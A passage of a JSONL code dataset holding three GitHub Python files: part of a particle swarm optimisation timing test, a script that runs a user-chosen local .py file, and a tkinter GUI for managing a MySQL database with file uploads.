= (inertia * self.velocity) + (alpha[0] * beta[0] * (self.local_best - self.position)) + (alpha[1] * beta[1] * (global_best - self.position))\n\n    def update_local_best(self):\n        if calc_fitness(self.position) > calc_fitness(self.local_best):\n            self.local_best = self.position\n\ndef calc_acc_cost(position):\n    days = position // 1440\n    return round((30 + (days * 30) + ((7 - days) * 25)), 2)\n\ndef calc_ren_lvl(position):\n    T = position / 1440\n    return ((T**2) / 126) + (T / 63) + 0.5\n\ndef calc_mov_cost(position):\n    t = (position % 1440) / 60\n    return round(((50 * math.cos((12 * math.pi * t) / 24)) + (50 * math.cos((8 * math.pi * t) / 24)) + 150),2)\n\ndef calc_fitness(position):\n    # fixed values for the minimum and maximum values of each variable\n    ren_lvl_range = [0.5, 1]\n    acc_cost_range = [205, 235]\n    mov_cost_range = [68.29, 250]\n\n    # calculate the cost and levels\n    accommodation_cost = calc_acc_cost(position)\n    renovation_level = calc_ren_lvl(position)\n    moving_cost = calc_mov_cost(position)\n\n    ## fitness function, all values are scaled to 0-1\n    fitness = renovation_level\n    fitness += 1 - 
(((accommodation_cost - acc_cost_range[0]) + (moving_cost - mov_cost_range[0])) / ((acc_cost_range[1] - acc_cost_range[0]) + (mov_cost_range[1] - mov_cost_range[0])))\n\n    return fitness\n\ndef check_global_best(local_best, global_best):\n    if calc_fitness(local_best) > calc_fitness(global_best):\n        return local_best\n    else:\n        return global_best\n\n\ndef calc_avg_fit_diff(particles):\n    fitness = list(map(calc_fitness, [particle.position for particle in particles]))\n    mean_fitness = sum(fitness) / len(fitness)\n    difference = [abs(fit-mean_fitness) for fit in fitness]\n    avg_fit_diff = sum(difference)/len(difference)\n    return avg_fit_diff\n\ndef calc_avg_pos_diff(particles):\n    position_list = [particle.position for particle in particles]\n    mean_position = sum(position_list) / len(position_list)\n    difference = [abs(pos - mean_position) for pos in position_list]\n    avg_pos_diff = sum(difference)/len(difference)\n    return avg_pos_diff\n\ndef initialize_particles(num_particles, position_limits, spawn_segments):\n    particles = []\n    pop_segment = num_particles//spawn_segments\n    range_val = position_limits[1]//spawn_segments\n    min_val = position_limits[0]\n    max_val=range_val\n    for segment in range(spawn_segments):\n        for num in range(pop_segment):\n            particles.append(Particle(random.randint(min_val, max_val)))\n        min_val+=range_val\n        max_val+=range_val\n    return particles\n\ndef main():\n    computation_list = []\n    \n    for i in range(1, 101):\n        random.seed(5)\n        # fixed variables\n        position_cap = 10079 # minute representation of Sunday 11:59\n\n        # parameters \n        alpha = [0.5, 0.5]\n        alpha_change = 0.1 # How much alpha values increase or decrease at split\n        inertia_weight = 1\n        inertia_change = 0.2 # How much inertia weight decrease at split\n        iteration_split = 5 # Iteration split - alpha and inertia values increase/decrease at split\n        num_particles = 10*i\n        spawn_segments = 10 # Initialization splits\n        \n        # termination condition\n        max_iter = 100\n        min_avg_fit_diff = 0.01\n        min_avg_dis_diff = 0.01\n\n        # initialization\n        global_best = None\n        position_limits = [0, position_cap]\n        curr_iter = 0\n\n        particles = initialize_particles(num_particles, position_limits, spawn_segments)\n        global_best = particles[0].position\n        start = time.time()\n        while((curr_iter < max_iter) and (calc_avg_fit_diff(particles) > min_avg_fit_diff) and (calc_avg_pos_diff(particles) > min_avg_dis_diff)):\n            \n            if (curr_iter % (max_iter//iteration_split) == 0) and (curr_iter != 0):\n                inertia_weight -= inertia_change\n                alpha[0] -= alpha_change\n                alpha[1] += alpha_change\n\n            for particle in particles:\n                particle.update_local_best()\n                global_best = check_global_best(particle.local_best, global_best)\n            \n            beta = [1,1]\n\n            for particle in particles:\n                particle.update_velocity(inertia_weight, alpha, beta, global_best)\n                particle.update_position(position_limits)\n            \n            curr_iter += 1\n        \n        computation_list.append(time.time()-start)\n        print(time.time()-start)\n    \n    plt.figure()\n    plt.plot([x*10 for x in range(1,101)], computation_list)\n    plt.ylabel(\"Computation time (s)\")\n    plt.xlabel(\"Population\")\n    plt.title(\"Computational time vs Population\")\n    plt.savefig(\"Computational_time_vs_Population\",bbox_inches='tight')\n    plt.show()\n\nif __name__ == \"__main__\":\n    main()","repo_name":"Nonentity5565/Computational-Intelligence-Assignment1","sub_path":"Problem 2 - Particle Swarm 
Optimization/Tests/population_time_complexity_test.py","file_name":"population_time_complexity_test.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"22691400082","text":"import os\nimport subprocess\n\ndef execute_python_file(file_name):\n    try:\n        subprocess.run([\"python\", file_name], check=True)\n    except FileNotFoundError:\n        print(f\"The file '{file_name}' does not exist.\")\n    except subprocess.CalledProcessError as e:\n        print(f\"An error occurred while executing '{file_name}':\")\n        print(e)\n\ndef main():\n    current_directory = os.getcwd()\n    file_list = [file for file in os.listdir(current_directory) if file.endswith(\".py\")]\n    \n    if not file_list:\n        print(\"No Python files found in the current directory.\")\n        return\n\n    print(\"Python files in the current directory:\")\n    for idx, file_name in enumerate(file_list, start=1):\n        print(f\"{idx}. {file_name}\")\n\n    user_choice = input(\"Enter the number corresponding to the file you want to execute (or 'q' to quit): \")\n    if user_choice.lower() == 'q':\n        return\n\n    try:\n        file_index = int(user_choice) - 1\n        selected_file = file_list[file_index]\n        execute_python_file(selected_file)\n    except (ValueError, IndexError):\n        print(\"Invalid input. Please enter a valid file number.\")\n        main()\n\nif __name__ == '__main__':\n    main()\n","repo_name":"BeautyScraper/ftppy","sub_path":"batch_file_gen.py","file_name":"batch_file_gen.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"8037321044","text":"from tkinter.ttk import Combobox, Treeview, Frame, Entry, Checkbutton, Radiobutton\nfrom tkinter import messagebox as mb, BooleanVar, IntVar, filedialog as fd\nfrom tkinter import Tk, Label, Button\nfrom pymysql import DatabaseError, OperationalError\nfrom DataBase import DataBase, CONN_INFO\nfrom datetime import datetime as dt\nimport shutil as sh\nimport os\n\n\nclass DBWindow(Tk):\n    def __init__(self):\n        try:\n            super().__init__()\n            self.attributes(\n                \"-fullscreen\",\n                True\n            )\n\n            # =====================Variables=====================\n\n            self.__db: DataBase\n            self.__r_var = IntVar()\n            self.__r_var.set(0)\n            self.__old_r_var = IntVar()\n            self.__old_r_var.set(self.__r_var.get())\n            self.__radio_btns: list = []\n            self.__old_record: tuple = ()\n            self.__old_path_to_file: str = ''\n            self.__old_file_name: str = ''\n            self.__path_to_file: str = ''\n            self.__file_name: str = ''\n            self.__need_to_upload_file: bool = False\n\n            # =======================Dicts=======================\n\n            self.__input_entries: dict = {}\n            self.__input_entries_lbls: dict = {}\n            self.__input_combos_vars: dict = {}\n            self.__column_types: dict = {}\n            self.__columns: dict = {}\n            self.__input_values: dict = {'names': [], 'values': []}\n            self.__input_values_mul: dict = {}\n\n            # ================Initializing DBFrame================\n\n            self.__frame_db = Frame(self)\n            self.__frame_table = Frame(self.__frame_db, width=1300, height=650)\n            self.__frame_table.pack_propagate(False)\n            self.iconbitmap('icon.ico') # updating the application icon\n            self.__table = Treeview(self.__frame_table, columns=(), show='headings', height=650)\n            self.__table.bind('<<TreeviewSelect>>', self.__select_table_item)\n            self.__frame_chosen_table = Frame(self.__frame_db, padding=5)\n            # self.__lbl = Label(self.__frame_chosen_table, text=\"Привет\", font=24) # a plain label\n            # self.__btn_choose = Button(self.__frame_chosen_table, 
text=\"Выбрать\", font=24, bg=\"white\", fg=\"blue\",\n # command=self.__choose_table_click) # создание кнопки\n self.__btn_quit = Button(self.__frame_chosen_table, text=\"Выйти\", font=('Comic Sans MS', 12), bg=\"white\",\n fg=\"blue\", command=self.__quit_click, height=27)\n # self.__combo = Combobox(self.__frame_chosen_table) # создание поля выбора\n self.__frame_radio = Frame(self.__frame_db, relief='sunken')\n self.__radio_lbl = Label(self.__frame_radio, text='Выберите таблицу:', font=('Comic Sans MS', 10))\n self.__frame_input_value = Frame(self.__frame_db, relief='ridge')\n self.__input_entries_text = Label(self.__frame_input_value, text='Введите данные: ',\n font=('Arial', 10))\n self.__frame_insert_btns = Frame(self.__frame_db, relief='sunken', padding=5, width=1300)\n self.__insert_btn = Button(self.__frame_insert_btns, text='Добавить', font=('Comic Sans MS', 14),\n bg='white', fg='blue', command=self.__insert_click, width=1290 // 34 + 1)\n self.__delete_btn = Button(self.__frame_insert_btns, text='Удалить', font=('Comic Sans MS', 14), bg='red',\n fg='black', command=self.__delete_click, width=1290 // 34 + 1)\n self.__update_btn = Button(self.__frame_insert_btns, text='Обновить', font=('Comic Sans MS', 14),\n bg='white', fg='blue', command=self.__update_click, width=1290 // 34 + 1)\n\n # ================Initializing LogInFrame================\n\n self.__frame_log_in = Frame(self)\n\n self.__frame_input = Frame(self.__frame_log_in)\n self.__frame_input.pack_propagate(False)\n self.__host_lbl = Label(self.__frame_input, text='Enter host:', font=('Comic Sans MS', 10))\n self.__input_host = Entry(self.__frame_input, width=40, font=('Comic Sans MS', 10))\n self.__input_host.insert('end', str(CONN_INFO['HOST']))\n self.__port_lbl = Label(self.__frame_input, text='Enter port:', font=('Comic Sans MS', 10))\n self.__input_port = Entry(self.__frame_input, width=40, font=('Comic Sans MS', 10))\n self.__input_port.insert('end', str(CONN_INFO['PORT']))\n self.__user_lbl = Label(self.__frame_input, text='Enter user:', font=('Comic Sans MS', 10))\n self.__input_user = Entry(self.__frame_input, width=40, font=('Comic Sans MS', 10))\n self.__input_user.insert('end', str(CONN_INFO['USER']))\n self.__password_lbl = Label(self.__frame_input, text='Enter password:', font=('Comic Sans MS', 10))\n self.__input_password = Entry(self.__frame_input, width=40, show='*', font=('Comic Sans MS', 10))\n self.__input_password.insert('end', str(CONN_INFO['PASSWORD']))\n self.__select_db = Combobox(self.__frame_input, width=39, font=('Comic Sans MS', 10))\n self.__set_db_values()\n self.__db_lbl = Label(self.__frame_input, text='Enter database:', font=('Comic Sans MS', 10))\n self.__input_db = Entry(self.__frame_input, width=40, font=('Comic Sans MS', 10))\n self.__input_db.insert('end', str(CONN_INFO['DATABASE']))\n self.__var_check = BooleanVar()\n self.__check_select_db = Checkbutton(self.__frame_input, text='Выбрать базу данных',\n variable=self.__var_check, command=self.__on_change_check)\n self.__frame_login_btns = Frame(self.__frame_input)\n self.__connect_btn = Button(self.__frame_login_btns, text='Подключиться', bg='#28A745',\n font=('Comic Sans MS', 14), fg='white', command=self.__connect_click)\n self.__quit_login_btn = Button(self.__frame_login_btns, text='Выйти', bg='#E6676B',\n font=('Comic Sans MS', 14), command=self.__quit_click)\n\n self.__grid_log_in_frame()\n except Exception as e:\n mb.showerror(str(e), str(e.args))\n\n # ==========================================================\n\n # 
self.geometry('1280x720') # window size\n        # self.__txt = Entry(self, width=10) # creating an input field\n        # self.__txt.grid(column=1, row=0)\n\n        # ==========================================================\n\n    def __grid_log_in_frame(self):\n\n        self.title('Log in')\n\n        self.__pack_forget(True)\n\n        # ================Griding LogInFrame================\n\n        for child in self.__frame_input.winfo_children():\n            child.grid_configure(padx=5, pady=5)\n        for child in self.__frame_login_btns.winfo_children():\n            child.grid_configure(padx=10)\n        self.__host_lbl.grid(column=0, row=0)\n        self.__input_host.grid(column=1, row=0)\n        self.__port_lbl.grid(column=0, row=1)\n        self.__input_port.grid(column=1, row=1)\n        self.__user_lbl.grid(column=0, row=2)\n        self.__input_user.grid(column=1, row=2)\n        self.__password_lbl.grid(column=0, row=3)\n        self.__input_password.grid(column=1, row=3)\n        self.__check_select_db.grid(column=1, row=4)\n        self.__db_lbl.grid(column=0, row=5)\n        self.__input_db.grid(column=1, row=5)\n        self.__select_db.grid(column=1, row=5)\n        self.__select_db.grid_forget()\n        self.__connect_btn.grid(column=0, row=0)\n        self.__quit_login_btn.grid(column=1, row=0)\n        self.__frame_login_btns.grid(column=1, row=6)\n        self.__frame_input.pack()\n        self.__frame_log_in.update()\n        pady = (int(self.winfo_width()) - int(self.__frame_log_in.winfo_reqwidth())) // 4\n        padx = (int(self.winfo_height()) - int(self.__frame_log_in.winfo_reqheight())) // 4\n        self.__frame_log_in.pack(fill='both', anchor='center', padx=padx, pady=pady)\n\n    def __grid_db_frame(self):\n\n        self.attributes(\n            \"-fullscreen\",\n            True\n        )\n\n        self.title('GameDev Application') # updating the application title\n        self.__pack_forget(False)\n        self.__init_radio_btns()\n\n        # ================Griding DBFrame================\n\n        self.__radio_lbl.grid(column=0, row=0, sticky='w')\n        for i in self.__radio_btns:\n            i.grid(column=0, row=i['value'] + 1, sticky='w')\n        for child in self.__frame_radio.winfo_children():\n            child.grid_configure(padx=5, pady=2)\n        self.__frame_radio.grid(row=0, column=0, sticky='nw', padx=10, pady=15)\n        self.__table.pack(anchor='nw', fill='both')\n        self.__frame_table.grid(row=0, column=1, pady=15)\n        # self.__lbl.grid(row=0, column=0, sticky='w') # lays out the widgets on the form\n        # self.__btn_choose.grid(row=2, column=0, sticky='w')\n        self.__btn_quit.pack(fill='both')\n        # self.__combo.grid(row=1, column=0, sticky='w', pady=50)\n        self.__frame_chosen_table.grid(row=0, column=2)\n        self.__input_entries_text.grid(column=0, row=1, padx=5, pady=5)\n        self.__frame_input_value.grid(row=1, column=1, sticky='w')\n        self.__delete_btn.pack(side='left', fill='both')\n        self.__insert_btn.pack(side='left', fill='both')\n        self.__update_btn.pack(side='left', fill='both')\n        self.__frame_insert_btns.grid(column=1, row=2)\n        # self.__set_combo(values=self.__db.get_tables())\n        # self.__set_table(columns=self.__db.get_columns(self.__combo.get()),\n        #                  values=self.__db.get_values(self.__combo.get()))\n        self.__frame_db.pack(fill='both')\n\n    def __init_radio_btns(self):\n\n        # ================Initializing Radiobutton================\n\n        index: int = 0\n        for i in self.__db.get_tables():\n            self.__radio_btns.append(\n                Radiobutton(\n                    self.__frame_radio,\n                    text=i,\n                    variable=self.__r_var,\n                    value=index,\n                    command=self.__choose_table_click\n                )\n            )\n            self.__input_entries[i] = []\n            self.__input_entries_lbls[i] = []\n            index += 1\n\n    def __pack_forget(self, db: bool):\n\n        temp: Frame\n        if db:\n            temp = self.__frame_db\n        else:\n            temp = self.__frame_log_in\n        for i in 
temp.winfo_children():\n            for j in i.winfo_children():\n                for k in j.winfo_children():\n                    k.pack_forget()\n                j.pack_forget()\n            i.pack_forget()\n        temp.pack_forget()\n\n    def __choose_table_click(self):\n        # self.__set_table(columns=self.__db.get_columns(self.__combo.get()),\n        #                  values=self.__db.get_values(self.__combo.get()))\n\n        self.__input_values['values'] = []\n        self.__column_types = {}\n        self.__input_values['names'] = []\n        res_columns = self.__db.get_columns(self.__radio_btns[self.__r_var.get()]['text'])\n        res_values = self.__db.get_values(self.__radio_btns[self.__r_var.get()]['text'])\n        index: int = 0\n        self.__columns[self.__radio_btns[self.__r_var.get()]['text']] = res_columns['columns']\n        for i in res_columns['types']:\n            self.__column_types[res_columns['columns'][index]] = i\n            index += 1\n        self.__set_table(columns=res_columns['columns'],\n                         values=res_values)\n\n        # ================Initializing Entries================\n\n        if self.__input_entries[str(self.__radio_btns[self.__old_r_var.get()]['text'])]:\n            for i in self.__input_entries[str(self.__radio_btns[self.__old_r_var.get()]['text'])]:\n                i.grid_forget()\n\n        if self.__input_entries_lbls[str(self.__radio_btns[self.__old_r_var.get()]['text'])]:\n            for i in self.__input_entries_lbls[str(self.__radio_btns[self.__old_r_var.get()]['text'])]:\n                i.grid_forget()\n\n        if not self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']]:\n            self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']] = []\n            self.__input_entries_lbls[self.__radio_btns[self.__r_var.get()]['text']] = []\n\n        for i in self.__input_values['names']:\n            if 'id' in i[:4]:\n                table_exist: bool = True\n                if not self.__radio_btns[self.__r_var.get()]['text'] == i[3:] + 's' and \\\n                        not self.__radio_btns[self.__r_var.get()]['text'] == i[3:] + 'es':\n                    flag: bool = False\n                    try:\n                        need_to_create: bool = True\n                        for j in tuple(self.__db.get_values(i[3:] + 's')):\n                            if need_to_create:\n                                self.__input_values_mul[i[3:] + 's'] = ()\n                                need_to_create = False\n                            for k in j:\n                                if type(k) is str:\n                                    self.__input_values_mul[i[3:] + 's'] += (k,)\n                                    break\n                    except DatabaseError:\n                        flag = True\n                    if flag:\n                        try:\n                            need_to_create: bool = True\n                            for j in tuple(self.__db.get_values(i[3:] + 'es')):\n                                if need_to_create:\n                                    self.__input_values_mul[i[3:] + 'es'] = ()\n                                    need_to_create = False\n                                for k in j:\n                                    if type(k) is str:\n                                        self.__input_values_mul[i[3:] + 'es'] += (k,)\n                                        break\n                        except DatabaseError:\n                            table_exist = False\n                            pass\n                    if table_exist:\n                        try:\n                            self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']].append(\n                                Combobox(self.__frame_input_value, values=self.__input_values_mul[i[3:] + 's'],\n                                         font=('Arial', 8))\n                            )\n                        except KeyError:\n                            try:\n                                self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']].append(\n                                    Combobox(self.__frame_input_value, values=self.__input_values_mul[i[3:] + 'es'],\n                                             font=('Arial', 8))\n                                )\n                            except KeyError:\n                                if flag:\n                                    mb.showwarning('DB is empty', 'Your table \\'' + i[3:]\n                                                   + 'es\\' is empty. Add some records to it '\n                                                   'outside this window, then restart the app.')\n                                else:\n                                    mb.showwarning('DB is empty', 'Your table \\'' + i[3:]\n                                                   + 's\\' is empty. Add some records to it '\n                                                   'outside this window, then restart the app.')\n                else:\n                    self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']].append(\n                        Entry(self.__frame_input_value, width=len(i), font=('Arial', 8))\n                    )\n            else:\n                self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']].append(\n                    
Entry(self.__frame_input_value, width=len(i), font=('Arial', 8))\n )\n elif 'id' in i:\n self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']].append(\n Entry(self.__frame_input_value, width=len(i) * 2, font=('Arial', 8))\n )\n elif 'name' in i or 'date' in i:\n self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']].append(\n Entry(self.__frame_input_value, width=len(i) * 2, font=('Arial', 8))\n )\n elif 'login' in i or 'password' in i or 'patronymic' in i:\n self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']].append(\n Entry(self.__frame_input_value, width=len(i) * 3, font=('Arial', 8))\n )\n elif 'path' in i[len(i) - 7:] or 'file' in i[len(i) - 7:]:\n self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']].append(\n Button(\n self.__frame_input_value,\n width=len(i) * 2,\n font=('Arial', 8),\n text='Выбрать файл',\n command=self.__choose_file\n )\n )\n else:\n if self.__column_types[i] == 'bit(1)':\n self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']].append(\n Combobox(self.__frame_input_value, values=('Да', 'Нет'), font=('Arial', 8))\n )\n else:\n self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']].append(Entry(\n self.__frame_input_value, width=len(i) * 5, font=('Arial', 8))\n )\n self.__input_entries_lbls[self.__radio_btns[self.__r_var.get()]['text']].append(\n Label(self.__frame_input_value, text=i, font=('Arial', 8))\n )\n\n index = 0\n for i in self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']]:\n i.grid(column=index + 1, row=1, padx=5, pady=2)\n index += 1\n\n index = 0\n for i in self.__input_entries_lbls[self.__radio_btns[self.__r_var.get()]['text']]:\n i.grid(column=index + 1, row=0, padx=5, pady=2, sticky='w')\n index += 1\n\n self.__old_r_var.set(self.__r_var.get())\n\n def __select_table_item(self, _):\n self.__input_values['values'] = []\n self.__path_to_file = ''\n cur_item = self.__table.focus()\n values_item = self.__table.item(cur_item)['values']\n index: int = 0\n for i in values_item:\n if type(self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']][index]) is Button:\n self.__path_to_file = i\n else:\n self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']][index].delete(0, 'end')\n self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']][index].insert('end', i)\n self.__input_values['values'].append(i)\n index += 1\n self.__old_record = self.__reformat_input_values(True)\n self.__update_old_file()\n pass\n # print(self.__input_values)\n\n # def __set_combo(self, values: tuple):\n # self.__combo['values'] = values\n # self.__combo.current(0) # установите вариант по умолчанию\n\n def __set_table(self, columns: tuple, values: list):\n self.__table.delete(*self.__table.get_children())\n self.__table.configure(columns=columns, show='headings', selectmode='extended')\n for i in columns:\n if 'id' in i[:4]:\n if self.__radio_btns[self.__r_var.get()]['text'] == i[3:] + 's' or \\\n self.__radio_btns[self.__r_var.get()]['text'] == i[3:] + 'es':\n self.__table.heading(column=i, text='№')\n self.__table.column(i, minwidth=0, width=len(i) * 8, stretch=False)\n else:\n self.__table.heading(column=i, text=i[3:])\n self.__table.column(i, minwidth=0, width=len(i) * 15, stretch=False)\n elif 'name' in i or 'date' in i or 'patronymic' in i:\n if 'name' in i:\n self.__table.heading(column=i, text=i[:len(i) - 5])\n elif 'date' in i:\n self.__table.heading(column=i, text=i[len(i) - 4:])\n else:\n self.__table.heading(column=i, text=i)\n 
self.__table.column(i, minwidth=0, width=len(i) * 15, stretch=False)\n elif 'log' in i or 'password' in i:\n self.__table.heading(column=i, text=i)\n self.__table.column(i, minwidth=0, width=len(i) * 30, stretch=False)\n else:\n self.__table.heading(column=i, text=i)\n self.__table.column(i, minwidth=0, width=len(i) * 50, stretch=False)\n self.__input_values['names'].append(i)\n index: int\n number: int = 1\n for value in values:\n index = 0\n input_values_mul: tuple = ()\n for i in value:\n if 'id' in columns[index][:4]:\n if not self.__radio_btns[self.__r_var.get()]['text'] == columns[index][3:] + 's' and \\\n not self.__radio_btns[self.__r_var.get()]['text'] == columns[index][3:] + 'es':\n flag: bool = False\n try:\n next_step: bool = True\n for j in tuple(self.__db.get_values(columns[index][3:] + 's')):\n if next_step:\n if j[0] == i:\n for k in j:\n if type(k) is str:\n input_values_mul += (k,)\n next_step = False\n break\n except DatabaseError:\n flag = True\n if flag:\n try:\n next_step: bool = True\n for j in tuple(self.__db.get_values(columns[index][3:] + 'es')):\n if next_step:\n if j[0] == i:\n for k in j:\n if type(k) is str:\n input_values_mul += (k,)\n next_step = False\n break\n except DatabaseError:\n pass\n elif self.__column_types[columns[index]] == 'bit(1)':\n if i[0]:\n temp = list(value)\n temp[index] = 'Да'\n value = tuple(temp)\n else:\n temp = list(value)\n temp[index] = 'Нет'\n value = tuple(temp)\n pass\n index += 1\n\n self.__table.insert(\"\", 'end', values=(number,) + input_values_mul + value[1 + len(input_values_mul):])\n number += 1\n\n def __on_change_check(self):\n if self.__var_check.get():\n self.__db_lbl.config(text='Choose database:')\n self.__input_db.grid_forget()\n self.__select_db.grid(column=1, row=5)\n else:\n self.__select_db.grid_forget()\n self.__db_lbl.config(text='Entry database:')\n self.__input_db.grid(column=1, row=5)\n pass\n\n def __connect_click(self):\n try:\n CONN_INFO['HOST'] = self.__input_host.get()\n CONN_INFO['PORT'] = int(self.__input_port.get())\n CONN_INFO['USER'] = self.__input_user.get()\n CONN_INFO['PASSWORD'] = self.__input_password.get()\n if self.__var_check.get():\n CONN_INFO['DATABASE'] = self.__select_db.get()\n else:\n CONN_INFO['DATABASE'] = self.__input_db.get()\n\n self.__db = DataBase()\n if self.__db.is_connect():\n self.__grid_db_frame()\n\n except DatabaseError and RuntimeError and ConnectionRefusedError and OperationalError:\n mb.showerror('Wrong database info', 'Database connection error! 
Try entering other data.')\n\n def __insert_click(self):\n table = self.__radio_btns[self.__r_var.get()]['text']\n try:\n if self.__need_to_upload_file:\n self.__upload_file()\n values = self.__reformat_input_values(False)\n self.__db.input_value(\n table=table,\n columns=tuple(self.__columns[table][1:]),\n values=values,\n types=self.__column_types\n )\n res_columns = self.__db.get_columns(self.__radio_btns[self.__r_var.get()]['text'])\n res_values = self.__db.get_values(self.__radio_btns[self.__r_var.get()]['text'])\n self.__set_table(columns=res_columns['columns'],\n values=res_values)\n if self.__need_to_upload_file:\n self.__update_old_file()\n self.__need_to_upload_file = False\n except DatabaseError as e:\n mb.showerror('DatabaseError', 'Something went wrong...\\n' + str(e.args))\n pass\n\n def __delete_click(self):\n table = self.__radio_btns[self.__r_var.get()]['text']\n values = self.__reformat_input_values(True)\n try:\n self.__db.delete_value(\n table=table,\n columns=tuple(self.__columns[table][1:]),\n values=values,\n types=self.__column_types\n )\n if not self.__path_to_file == '':\n self.__delete_file()\n res_columns = self.__db.get_columns(self.__radio_btns[self.__r_var.get()]['text'])\n res_values = self.__db.get_values(self.__radio_btns[self.__r_var.get()]['text'])\n self.__set_table(columns=res_columns['columns'],\n values=res_values)\n except DatabaseError as e:\n mb.showerror('DatabaseError', 'Something went wrong...\\n' + str(e.args))\n pass\n\n def __update_click(self):\n table = self.__radio_btns[self.__r_var.get()]['text']\n try:\n if self.__need_to_upload_file:\n self.__upload_file()\n self.__delete_old_file()\n self.__need_to_upload_file = False\n values = self.__reformat_input_values(True)\n self.__db.update_value(\n table=table,\n columns=tuple(self.__columns[table][1:]),\n values=values,\n types=self.__column_types,\n old_values=self.__old_record\n )\n res_columns = self.__db.get_columns(self.__radio_btns[self.__r_var.get()]['text'])\n res_values = self.__db.get_values(self.__radio_btns[self.__r_var.get()]['text'])\n self.__set_table(columns=res_columns['columns'],\n values=res_values)\n except DatabaseError as e:\n mb.showerror('DatabaseError', 'Something went wrong...\\n' + str(e.args))\n\n def __reformat_input_values(self, delete_update: bool) -> tuple:\n values: tuple = ()\n table = self.__radio_btns[self.__r_var.get()]['text']\n index: int = 0\n for i in self.__input_entries[table]:\n if not index == 0:\n if type(i) is Entry:\n if self.__column_types[self.__input_entries_lbls[table][index]['text']] == 'timestamp':\n if delete_update:\n values += (i.get().replace('\\'', '_').replace('\\\"', '_'),)\n else:\n values += (str(dt.now()),)\n else:\n values += (i.get().replace('\\'', '_').replace('\\\"', '_'),)\n elif type(i) is Button:\n values += (self.__path_to_file.replace('\\'', '_').replace('\\\"', '_'), )\n else:\n if self.__column_types[self.__input_entries_lbls[table][index]['text']] == 'bit(1)':\n if 'Да' in i.get():\n values += (str(1),)\n else:\n values += (str(0),)\n else:\n mul_table = self.__input_entries_lbls[table][index]['text']\n try:\n values += (\n str(\n [\n n for n, x in enumerate(\n self.__input_values_mul[mul_table[3:] + 's']\n ) if i.get() in x\n ].pop(0) + 1\n ),\n )\n except KeyError:\n values += (\n str(\n [\n n for n, x in enumerate(\n self.__input_values_mul[mul_table[3:] + 'es']\n ) if i.get() in x\n ].pop(0) + 1\n ),\n )\n index += 1\n return values\n\n def __choose_file(self):\n self.__update_old_file()\n 
self.__need_to_upload_file = True\n        self.__path_to_file = fd.askopenfile()\n        if self.__path_to_file is not None:\n            self.__path_to_file = self.__path_to_file.name\n            lst = self.__path_to_file.replace('\\\\', '/').split('/')\n            self.__file_name = lst[len(lst) - 1]\n            self.__update_file_name_entry()\n\n
    def __update_old_file(self):\n        self.__old_path_to_file = self.__path_to_file\n        index: int = 0\n        table = self.__radio_btns[self.__r_var.get()]['text']\n        for i in self.__input_entries_lbls[table]:\n            if 'name' in i['text']:\n                self.__old_file_name = self.__input_entries[table][index].get()\n                break\n            index += 1\n\n
    def __upload_file(self):\n        table = self.__radio_btns[self.__r_var.get()]['text']\n        directory = str(os.getcwd()) + '/' + table\n        if not os.path.exists(directory):\n            os.makedirs(str(directory))\n        try:\n            sh.copy(str(self.__path_to_file), directory)\n            self.__path_to_file = directory.replace('\\\\', '/')\n        except sh.SameFileError:\n            name_lst = self.__file_name.split('.')\n            index: int = 0\n            self.__file_name = ''\n            for i in name_lst:\n                if not index + 1 == len(name_lst):\n                    self.__file_name += i\n                else:\n                    self.__file_name += '(copy).' + i\n                index += 1\n            self.__update_file_name_entry()\n            sh.copy(\n                str(self.__path_to_file),\n                directory + '/' + self.__file_name)\n            self.__path_to_file = directory.replace('\\\\', '/')\n\n
    def __delete_old_file(self):\n        if os.path.exists(self.__old_path_to_file + '/' + self.__old_file_name):\n            os.remove(str(self.__old_path_to_file + '/' + self.__old_file_name))\n        else:\n            mb.showwarning('Something went wrong...',\n                           'File ' + self.__old_path_to_file + '/' + self.__old_file_name + ' not found...')\n        self.__old_path_to_file = ''\n        self.__old_file_name = ''\n\n
    def __delete_file(self):\n        if os.path.exists(self.__path_to_file + '/' + self.__file_name):\n            os.remove(self.__path_to_file + '/' + self.__file_name)\n        else:\n            mb.showwarning('Something went wrong...',\n                           'File ' + self.__path_to_file + '/' + self.__file_name + ' not found...')\n        self.__path_to_file = ''\n        self.__file_name = ''\n\n
    def __update_file_name_entry(self):\n        index: int = 0\n        table = self.__radio_btns[self.__r_var.get()]['text']\n        for i in self.__input_entries_lbls[table]:\n            if 'name' in i['text']:\n                self.__input_entries[table][index].delete(0, 'end')\n                self.__input_entries[table][index].insert('end', self.__file_name)\n                break\n            index += 1\n\n    def __quit_click(self):\n        question = mb.askokcancel('Quit', 'Are you sure?')\n        if question:\n            self.destroy()\n\n    def __set_db_values(self, values: tuple = CONN_INFO['DATABASES']):\n        self.__select_db['values'] = values\n        self.__select_db.current(0)  # set the default option\n\n    def start(self):\n        self.mainloop()\n","repo_name":"PriFo/tkinter_app","sub_path":"DBWindow.py","file_name":"DBWindow.py","file_ext":"py","file_size_in_byte":34104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"}
